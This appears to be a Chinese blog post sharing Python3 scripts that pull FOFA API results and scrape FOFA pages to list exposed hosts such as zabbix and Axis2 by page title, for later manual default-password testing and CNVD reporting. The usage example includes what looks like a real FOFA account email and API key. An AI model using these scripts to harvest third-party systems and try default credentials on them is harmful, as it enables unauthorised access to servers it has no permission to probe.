MYD网络安全实验室视觉艺术

python3探测弱口令的编写

2020-04-24  本文已影响0人  CSeroad

前言

最近需要大规模地提交CNVD漏洞,手里的漏洞零零散散也没有几个。时间也比较急。虽然网上整天都有通用漏洞,但这类通用漏洞有可能已经被刷过了。主要是我比较懒,不想刷太复杂的漏洞。所以我想到了弱口令。

刷弱口令

准确地说是刷一些系统的默认密码,比较不太常见且管理员一般不会修改的密码。而不是选择常见的系统后台管理口令。那么这类漏洞从哪来呢?从fofa来。

python3 调用fofa的API

普通会员fofa的API接口只允许100条数据。
这里以zabbix为例。
代码简介:
先获取fofa的api接口地址,即fofa_api。requests的get方法打开该接口。json.loads转化为字典,依次拼接为url地址。BeautifulSoup爬取tilte信息。并和vuln_title进行简单的正则匹配。且将匹配到title的url地址进行保存到title.txt文件

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# code by CSeroad

import requests
import sys
import re
from bs4 import BeautifulSoup
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def save_result(filename,url):
    with open(filename,'a+') as f:
        f.write(str(url)+'\n')

def vulwebsearch(api_url,vuln_title):
    response = requests.get(url=api_url)
    restring = response.text
    resdict = json.loads(restring)
    vulhostlist = resdict['results']
    for vullist in vulhostlist:
        host = vullist[1]
        port = vullist[2]
        if port == '443':
            base_url = 'https://'+host
        else:
            base_url = 'http://'+host+':'+port
        vuln_url = base_url
        print(vuln_url)
        fofa_spider(vuln_url,vuln_title)
def fofa_spider(vuln_url,vuln_title):
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
    url = vuln_url
    try:
        response = requests.get(url=url,headers=headers,timeout=3,verify=False).text
        soup = BeautifulSoup(response,'lxml')
        title = soup.title.string
        if re.search('.*'+vuln_title+'.*', title, re.IGNORECASE):
            print("%-27s %-30s\n" % (url,title))
            filename = title+'.txt'
            save_result('filename',url)
    except Exception as e:
                pass

if __name__=="__main__":
    if(len(sys.argv) == 3):
        api_url = sys.argv[1]
        vuln_title = sys.argv[2]
        vuln_title.strip()
        vulwebsearch(api_url,vuln_title)
    else:
        print('Usage:fofa_api_title.py fofa_api vuln_title')

使用方法:

python3 fofa_api_title.py "https://fofa.so/api/v1/search/all?email=lvxy@starso.cn&key=a592d4b70d1122bebbbb8c285c318b3e&qbase64=emFiYml4" "zabbix"

传入fofa_api的url地址和title信息即可。
注意传递参数时加引号。
爬取zabbix,运行效果:

zabbix

爬取Axis2,运行效果:

Axis2

python3 爬取fofa

因为fofa的API接口才只有100条,识别出title后再手动尝试弱口令肯定更少了。所以我选择进一步尝试爬取fofa的页数获取更多数据。
不太舒服的是fofa有反爬机制。多线程的作用大大减弱,测试大概爬取10页需要40秒。至少比手动快了。
代码简介:
1.使用threading5个线程,也就是一次爬取5页,然后sleep 20秒,再开始下一个5页。爬取的url地址同样进行保存在fofa_result.txt,可随时中断;
2.也可以不加--title信息,只会将爬取的结果保存到文件夹下;
3.加了--title也就是从爬取的文件fofa_result.txt进行再次筛选,功能上和fofa会有重复;

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# code by CSeroad

import requests
import base64
import re
from optparse import OptionParser
from bs4 import BeautifulSoup
from urllib.parse import quote,unquote
import threading
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

banner = '''
  ____ ____                           _
 / ___/ ___|  ___ _ __ ___   __ _  __| |
| |   \___ \ / _ \ '__/ _ \ / _` |/ _` |
| |___ ___) |  __/ | | (_) | (_| | (_| |
 \____|____/ \___|_|  \___/ \__,_|\__,_|

'''

def save_fofa_result(filename,url_list):
    for url in url_list:
        with open(filename,'a+') as f:
            f.write(str(url)+'\n')


def save_vuln_result(filename,vuln_url):
    with open(filename,'a+') as f:
        f.write(str(vuln_url)+'\n')

def getinfo(page,result_filename):
    print("当前第"+str(page)+"页")
    try:
        response = requests.get("https://fofa.so/result?full=true&page="+str(page)+"&qbase64="+str(qbase64),headers=headers)
        findurl = re.findall('<a target="_blank" href="(.*)">.* <i class="fa fa-link">',response.text)
        print(findurl)
        save_fofa_result(result_filename,findurl)
    except Exception as e:
        print(e)

# 多线程去同时请求5页
def thread(page,result_filename):
    thread_list = []
    for threads in range(1,6):
        page += 1
        t = threading.Thread(target=getinfo,args=(page,result_filename))
        thread_list.append(t)
    for t in thread_list:
        t.start()
    for t in thread_list:
        t.join()

def url_title(vuln_title,result_filename):
    print("\033[1;37;40m"+'您要检索的titl为:'+vuln_title+"\033[0m")
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"}
    f = open(result_filename, "r")
    for line in f:
        vuln_url = line.strip()
        try:
            response = requests.get(url=vuln_url,headers=headers,timeout=3,verify=False).text
            soup = BeautifulSoup(response,'lxml')
            title = soup.title.string
            #print("%-27s %-30s\n" % (vuln_url,title))所有title
            if re.search('.*'+vuln_title+'.*', title, re.IGNORECASE):
                print("%-27s %-30s\n" % (vuln_url,title))
                vuln_name = vuln_title+'_title.txt'
                save_vuln_result(vuln_name,vuln_url)
        except Exception as e:
            pass

def spider_pagenum(keyword):
    global qbase64
    qbase64 = quote(base64.b64encode(keyword.encode('utf-8')),'utf-8')
    print("\033[1;37;40m"+'您要检索的内容为:'+keyword+"\033[0m")
    pageurl = requests.get('https://fofa.so/result?qbase64='+qbase64,headers=headers)
    pagenum = re.findall('>(\d*)</a> <a class="next_page" rel="next"',pageurl.text)
    cookie_auto = re.findall(r'.*email.*@.*[com,cn,net]{1,3}',pageurl.text)
    # 验证cookie是否正确
    if pagenum and cookie_auto:
        pagenum = pagenum[0]
        print("\033[1;37;40m"+'经探测一共'+str(pagenum)+'页数据'+"\033[0m")
    else:
        print("\033[1;31;40m"+'cookie错误或fofa语法错误'+"\033[0m")
        exit()

if __name__ == '__main__':
    print(banner)
    parser = OptionParser("fofa_get_title.py --cookie cookie --search  keyword --pagenums num --out result_fofa.txt --title title")
    parser.add_option("--cookie",action="store",type="string",dest="cookie",help="用户的cookie信息")
    parser.add_option("--search",action="store",type="string",dest="keyword",help="fofa语法")
    parser.add_option("--pagenums",action="store",type="int",dest="pagenums",default=10,help="爬取页数,默认10页")
    parser.add_option("--out",action="store",type="string",dest="resultfilename",default="result_fofa.txt",help="fofa爬取后保存文件的名称,默认result_fofa.txt")
    parser.add_option("--title",action="store",type="string",dest="vuln_title",help="输入匹配的title信息")
    (options, args) = parser.parse_args()
    if options.cookie and options.keyword:
        t1 = time.time()
        cookie = options.cookie
        keyword = options.keyword
        keyword = keyword.strip()
        headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
        "Cookie":cookie
        }
        try:
            spider_pagenum(keyword)
            pagenums = options.pagenums
            result_filename = options.resultfilename
            print("\033[1;37;40m"+'您现在选择爬取:'+str(pagenums)+'页'+"\033[0m")
            for page in range(0,pagenums,5):
                thread(page,result_filename)
                time.sleep(20)
            print("\033[1;37;40m"+'已保存到\t>>>>>>\t'+result_filename+'文件'+"\033[0m")
            print('end time:',time.time()-t1)
            if options.vuln_title:
                vuln_title = options.vuln_title
                url_title(vuln_title,result_filename)
                print("\033[1;37;40m"+'已保存到\t>>>>>>\t'+vuln_title+'_title.txt文件'+"\033[0m")
            else:
                print("\033[1;31;40m"+'您没有输入--title参数,只爬取了'+str(pagenums)+'页'+"\033[0m")
        except Exception as e:
            print(e)
    else:
        parser.error('incorrect number of arguments')

使用方法

python3 get_fofa_title.py --cookie=cookie --search=keyword --pagenums=num --out=result_fofa.txt --title=title

参数介绍

--cookie   用户的cookie信息
--search   fofa查询的语法
--pagenums 爬取的页数,默认10页
--out      输出到文件,默认保存在result_fofa.txt
--title    爬取指定的title信息

运行效果:

image.png image.png image.png

再去手动探测是否存在弱口令。当然也可以进一步写批量扫描弱口令的脚本。
时间有限,还是提漏洞比较紧急。

利用该脚本可以刷很多服务的默认口令。这是这周收集的一些服务默认口令。
来日方长慢慢收集~

image.png

总结

写写代码很舒服。

上一篇下一篇

猜你喜欢

热点阅读